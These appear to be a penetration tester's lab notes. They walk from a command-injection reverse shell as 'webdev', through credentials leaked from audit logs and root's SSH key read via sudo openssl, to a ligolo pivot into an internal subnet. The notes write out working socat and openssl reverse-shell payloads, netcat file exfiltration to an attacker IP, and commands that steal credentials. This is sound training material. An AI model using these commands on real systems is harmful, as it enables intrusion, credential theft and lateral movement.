# Shell as `webdev` - payload ```bash curl http://monitoring.inlanefreight.local/ping.php?ip=127.0.0.1%0Asocat${IFS}TCP:10.10.15.114:9001${IFS}EXEC:bash ``` - stabilize shell - we have a hit ![[images/Pasted image 20260630222557.png]] - stabilize shell - we can read logs in `/var/log` because we are in the `adm` group - move `audit.log` to Kali ```bash which nc #check for nc on target nc -lnvp 9002 -q 3 > loot/audit.log #setup listener on kali nc -q 3 -nv 10.10.15.114 9002 < audit.log #push audit.log to Kali ``` - now we need a tool to parse `audit.log` ![[images/Pasted image 20260701172600.png]] - try `audit-pretty` first, then `aushape` - got both working and `grep` on `srvadm` and `webdev` - i see `/usr/bin/su` being called but no creds - try `aureport` - install `auditd` - we could have also done this on target - this leaks creds for `srvadm` ```bash sudo cat audit.log | aureport --tty | grep -B5 srvadm ``` # Shell as `srvadm` - `su` to `srvadm` - `flag.txt` in home dir - not much else - DMZ01 is dual-homed ![[images/Pasted image 20260701200741.png]] - we can run `openssl` as root ![[images/Pasted image 20260701175658.png]] - try below from GTFObins ```bash mkfifo /tmp/f sudo /bin/sh -i </tmp/f 2>&1 | sudo openssl s_client -quiet -connect 10.10.15.114:9002 >/tmp/f ``` - that did not work; instead, read `id_rsa` ```bash sudo openssl enc -in /root/.ssh/id_rsa > id_rsa ``` ![[images/Pasted image 20260701192428.png]] - move back to kali with above `nc` trick ![[images/Pasted image 20260701195304.png]] # Shell as `root` ## light enum - networking check ![[images/Pasted image 20260701195343.png]] - interface 4 (172.18.0.0/16) is a custom docker bridge network and interface 5 (172.17.0.0/16) is the default docker network - `.bash_history` ![[images/Pasted image 20260701195717.png]] - docker containers: `docker ps -a` ![[images/Pasted image 20260701195747.png]] - login shells ## host discovery - 172.16.8.0/16 subnet ```bash for i in {1..254} ;do (ping -c 1 172.16.8.$i | grep "bytes from" &) ;done ``` ![[images/Pasted image 20260701201424.png]] ## setup pivot - steps on Kali ```bash sudo ip tuntap add user $(whoami) mode tun ligolo && sudo ip link set ligolo up sudo ip route add 172.16.8.0/24 dev ligolo; ip route | grep ligolo sudo ./proxy -laddr 0.0.0.0:11601 -selfcert scp -i ../loot/dmz01.id_rsa agent [email protected]:/root #move ligolo agent to DMZ01 ``` - steps on DMZ01 ```bash ./agent -connect 10.10.15.114:11601 -ignore-cert ``` - steps in ligolo ```bash ligolo > session #select session 1 ligolo > start --tun ligolo ``` - confirm interface and routes ![[images/Pasted image 20260701202408.png]] - confirm with ping ![[images/Pasted image 20260701202428.png]]